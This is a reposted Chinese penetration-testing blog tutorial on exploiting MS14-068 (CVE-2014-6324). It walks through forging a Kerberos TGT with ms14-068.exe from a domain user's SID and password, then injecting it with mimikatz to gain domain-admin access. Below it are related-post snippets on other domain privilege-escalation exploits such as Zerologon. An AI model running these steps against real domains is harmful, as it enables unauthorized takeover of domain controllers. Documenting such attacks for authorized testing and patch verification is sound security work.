域***提权之MS14-068

最新推荐文章于 2024-08-22 14:35:09 发布
最新推荐文章于 2024-08-22 14:35:09 发布
阅读量330 收藏
点赞数
文章标签: python 运维
原文链接:http://blog.51cto.com/z2ppp/2060051
版权

0x00 前言

在做***测试时,当遇到域环境,获取到一个域成员账号后,如果域控制器未打好补丁,则可以利用本文所提到的漏洞,快速获取到域控制器权限。笔者这里总结网上已有资料,加以描述,希望你能在实际测试中派上用场。

0x01 准备工作

  1. 域成员账号及密码一个
  2. mimikatz
  3. ms14-068.exe
  4. 03以上服务器或pc

0x02 模拟环境

域控制器 2008r2 dc.test.com 192.168.3.100
域内机器 2008r2 client.test.com 192.168.3.10

0x03 漏洞自检

MS14-068编号CVE-2014-6324,补丁为3011780,如果自检可在域控制器上使用命令检测

systeminfo |find "3011780"

域***提权之MS14-068

为空则代表没有打该补丁,存在漏洞!
如果属于黑盒测试,并没有直接操作域控制器的权限,那么只能使用该漏洞,看是否能成功伪造域管理员登录来验证

0x04 漏洞利用

1. 获取域成员sid

获取域成员sid的方式有多种,当然前提是建立在0x01上,本次使用最为简单的命令获取

whoami /all  #该命令获取当前登录用户的信息,这里使用的是域成员登录,所以获取到的是域成员normal的sid

域***提权之MS14-068

2. 生成TGT票据

使用ms14-068.exe,网上有多种版本,有python脚本(需要在***机上安装python2.x版本,略麻烦),也有已经从python转exe的版本,不需要依赖python环境,下载地址:https://github.com/abatchy17/WindowsExploits/tree/master/MS14-068

C:\Users\normal\Desktop>MS14-068.exe
USAGE:
MS14-068.exe -u <userName>@<domainName> -s <userSid> -d <domainControlerAddr>

OPTIONS:
    -p <clearPassword>
 --rc4 <ntlmHash>

C:\Users\normal\Desktop>MS14-068.exe -u normal@test.com -s S-1-5-21-1406004368-3
818689962-3591297438-1105 -d 192.168.3.100 -p Server1
  [+] Building AS-REQ for 192.168.3.100... Done!
  [+] Sending AS-REQ to 192.168.3.100... Done!
  [+] Receiving AS-REP from 192.168.3.100... Done!
  [+] Parsing AS-REP from 192.168.3.100... Done!
  [+] Building TGS-REQ for 192.168.3.100... Done!
  [+] Sending TGS-REQ to 192.168.3.100... Done!
  [+] Receiving TGS-REP from 192.168.3.100... Done!
  [+] Parsing TGS-REP from 192.168.3.100... Done!
  [+] Creating ccache file 'TGT_normal@test.com.ccache'... Done!

使用方法:
ms14-068.exe -u 域成员名@域名 -s 域成员sid -d 域控制器地址 -p 域成员密码

如果操作正确,且域机器是可以和域控制器互通则会创建.ccache文件
域***提权之MS14-068
域成员密码错误情况图

3. 票据注入

使用mimikatz将票据注入到当前内存中,伪造凭证,如果成功则拥有域管理权限,可任意访问域中所有机器

mimikatz # kerberos::purge      //清空当前机器中所有凭证,如果有域成员凭证会影响凭证伪造
mimikatz # kerberos::list          //查看当前机器凭证
mimikatz # kerberos::ptc 票据文件         //将票据注入到内存中

域***提权之MS14-068
当显示injecting ticket ok时,表示已经成功将票据注入到内存中,可在机器中用klist查看
域***提权之MS14-068

4.测试

伪造后,进行尝试访问域控制器
域***提权之MS14-068

注入票据前是不能访问的
域***提权之MS14-068

0x05 细节

  1. 注入票据时,机器不能是03或xp,因为mimikatz不支持这两个机器注入,听大佬说过有工具可以注入,希望有知道的朋友可以留言
    域***提权之MS14-068

  2. 当获取到域用户、域用户sid、密码以及可访问到域控制器的机器,并不需要机器一定在域中(如***者通过***等拨入内网),但需要把dns指向域控制器才能解析
  3. 访问域控制器时,需要使用主机名,不能使用ip
    域***提权之MS14-068
  4. 如有错误,请指正,万分感谢

转载于:https://blog.51cto.com/z2ppp/2060051

CVE-2020-1472 提权利用(提权
墨痕诉清风的博客
01-25 2363
控(Win2008):192.168.199.131 用户(Win7):192.168.199.128 用户(Win03):192.168.199.129 漏洞验证工具:https://github.com/SecuraBV/CVE-2020-1472 利用+重置工具:https://github.com/risksense/zerologon 重置hexpass 工具:https://github.com/dirkjanm/CVE-2020-1472 工具运行环境:https://.
渗透之MS14-068(CVE-2014-6324)
谢公子的博客
06-24 6226
在做渗透测试时,当我们拿到了一个普通成员的账号后,想继续对该进行渗透,拿到控服务器权限。如果控服务器存在MS14_068漏洞,并且未打补丁,那么我们就可以利用MS14_068快速获得控服务器权限。 MS14-068编号CVE-2014-6324,补丁为3011780,如果自检可在控制器上使用命令检测。 systeminfo |find "3011780" 如下,为空说明该服务...
ms14-068提权
zz_strive_2012的专栏
06-17 2489
一、利用mimakatz.exe来抓取用户的口令 (1)首先利用ms14-058来提权得到管理员权限 (2)利用mimikatz.exe抓密码 可见抓到的口令。用户zhangsan,口令password1! 二、利用ms14-068提权工具生成伪造的kerberos协议认证证书 dir可见缓存数据: 三、利用mimikatz.exe将证书写入,从而提
内网渗透—横向移动&提权&漏洞横移
最新发布
2301_76227305的博客
08-22 1184
Windows服务权限提升漏洞(CVE-2021-42287, CVE-2021-42278)是由于Active Directory 服务没有进行适当的安全限制,导致可绕过安全限制进行权限提升。攻击者可利用该漏洞造成将内的普通用户权限提升到管理员权限等危害,具体的话自己查吧。
用户提权
wuxinweii的博客
11-21 3575
MS14-068漏洞利用 什么是MS14-068漏洞? 在kerberos 协议中,Client去访问Server,需要知道是否具有访问权限。所以微软在KRB_AS_REP中的TGT中增加了Client的PAC(特权属性证书),也就是Client的权限,包括Client的User的SID、Group的SID。 ms14-068 漏洞就是在经过身份验证的Client在TGT中伪造高权限的PAC。 该漏洞允许任何一个普通用户,将自己提升至管理员权限。微软给出的补丁号kb3011780。 MS14-068是非
nopac提权
http://www.gov.cn/xinwen/2016-11/07/content_5129723.htm
10-09 2805
nopac提权
简单的内的提权
m0_74326506的博客
07-11 2084
42287:微软规定一台机器的机器账号名以$结尾,但又没有做验证,所以一台机器叫dc的话,可以创建有着机器账户属性的dc账户44278:用dc账户向AS申请TGT票据后,然后去向TGS申请ST,在申请ST的时候删除dc这个账户,那么KDC在验证时就查不到dc这个账户,进而查到dc$这个账户,于是就将ST颁给dc¥这个账户。
Ms17-010进行WEB提权之实践下某培训靶机服务器
xiaoi123的博客
05-17 2895
前言:该机器为某个其他培训机构的靶机,说实话在这里没炫耀啥,只是给各位学习Ms17010的同学指一条路,我原先也折腾这玩意儿好久,但是就是不行,最近才找到了出路,所以多写两篇文章,把各种需要注意的地方,一步,一步写清楚,文章如果看不懂?那写出来的意义何在?ngrok与sunny都是匿名的好东西,此次攻击全程在kali下面完成,无需公网,并且使用的代理转发,都是一次性,So?下面开始准备工作1.Ka...
〖教程〗Ladon提权之Potato系列-windows全版本(IIS用户/服务用户)
K8哥哥
08-16 3080
Ladon提权之PipePotato/BadPotato/SweetPotato/PrintSpoofer 版本 >= Ladon 7.2.0 Update: 20200810 Potato提权原理 通过各种方法在本地NTLM中继获取SYSTEM令牌,再通过模拟令牌执行命令,通过以上方法提权统称为potato(不管是否基于原potato修改)。就像SQL注入,通过特定SQL语句注入获取特定数据库信息统称为SQL注入,而不管如何编写的SQL语句,是否基于别人的SQL语句修改。 提权条件 1 本地NTLM
CVE-2021-42278内权限提升
include_voidmain的博客
03-16 5052
0x01 漏洞背景 前些日子的靶场中涉及到了提权,当时刚好爆出CVE-2022-42278这个提权漏洞,正好下载下来了POC试了试,确实不错,于是打算看看这个只需一个用户,就能获取控权限的漏洞怎么回事,便有了这篇文章。 0x02 环境搭建 在这里搭建了一个简单的内网环境,主机AD_USER将445端口暴露在外,并且存在ms17_010,hacker通过AD_USER的445端口进入内,随后通过CVE-2021-42287拿下AD。 环境详情: 主机IP Hacker192.168.80.12
mssql数据库提权之——xp_cmdshell执行系统命令
01-19
所谓利用数据进行提权,利用的其实是数据库的运行权限,所以只要我们满足以下条件即可进行提权: 1、 必须获得sa的账号密码或者与sa相同权限的账号密码,且mssql没有被降权。 2、 必须可以以某种方式执行sql语句,...
MS14-068AD提权神器
05-24
本地WINDOWS: 1.python.exe ms14-068.py -u user-a-1@dom-a.loc -s S-1-5-21-557603841-771695929-1514560438-1103 -d dc-a-2003.dom-a.local user-a-1@dom-a.loc位用户 S-1-5-21-557603841-771695929-1514560438-1103 为账号SID dc-a-2003.dom-a.local这机全名 可以通过:1)wmic useraccount where name=”USERNAME” get sid 2)whoami /all 本机可以直接查出自己的SID; 用法国神器破解,需要时最新版本的才支持, 2.mimikatz.exe log "kerberos::ptc TGT_user-a-1@dom-a.loc.ccache" exit TGT_user-a-1@dom-a.loc.ccache指的是第一步所生成的ccache文件。 3. kerberos::ptc TGT_secpulse@secpulse.local.ccache 4.查看: klist net use \\DC2.secpulse.local\admin$ //注:使用IP可能会失败 dir \\DC2.secpulse.local\c$ 看看有木有权限 好运~
ms14-068.exe内神器
11-25
ms14-068.exe内神器
ms14-068利用工具包.zip
07-01
包含了minikatazx64位,以及MS14-068.exe和ms14-068.exe。工具可以放心使用。无后门,如果需要免杀可以自行混淆加壳
windows 提权CVE-2014-6324&CVE-2020-1472&CVE-2021-42287&CVE-2022-26923
m0_62207170的博客
03-11 709
windows 提权CVE-2014-6324&CVE-2020-1472&CVE-2021-42287&CVE-2022-26923
横向移动-提权
数据安全学习分享
08-14 392
由于Active Directory没有对中计算机和服务器账号进行验证,经过身份验证的攻击者利用该漏洞绕过完全限制,可将中普通用户权限提升为管理员权限并执行任意代码。
CVE-2020-1472(提权)
p01son的博客
08-02 701
CVE-2020-1472(提权) Created: July 7, 2021 5:25 PM 文章目录CVE-2020-1472(提权)简介影响范围复现环境复现过程恢复原机器hash参考 简介 CVE-2020-1472是一个windows控中严重的远程权限提升漏洞,是因为微软在Netlogon协议中没有正确使用加密算法而导致的漏洞。由于微软在进行AES加密运算过程中,使用了AES-CFB8模式并且错误的将IV设置为全零,这使得攻击者在明文(client chanllenge)、IV等要素可控的
CVE-2020-1472 提权
Adminxe的博客
12-29 2425
0x00 测试环境 DC(WIN-ENS2VR5TR3N):192.168.183.130 攻击机器:192.168.183.129 0x01 对控进行测试漏洞是否存在 python3 zerologon_tester.py WIN-ENS2VR5TR3N 192.168.183.130 0x02 使用zerologon工具将控密码打成空 (这里打空的用户是控所在机器的账户,并不是控账户。) python3 set_empty_pw DC_NETBIOS_NAME DC_I..
环境提权姿势
懂进攻知防守
08-15 1384
Netlogon权限提升2020年08月12日, 微软官方发布了 NetLogon 特权提升漏洞 的风险通告。攻击者通过NetLogon(MSNRPC),建立与控间易受攻击的安全通道时,可利用此漏洞获取管访问权限。成功利用此漏洞的攻击者。可以在该网络中的设备上运行经特殊设计的应用程序。......
数据结构-最小生成树算法
09-27
最小生成树算法是解决图的最小生成树问题的一种算法。...2. 对给定的图G(V, E),其最小生成树可以不唯一,但其边权之和是唯一的。 3. 最小生成树是在无向图上生成的,因此其根节点可以是在这棵树上的任意一个顶点。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值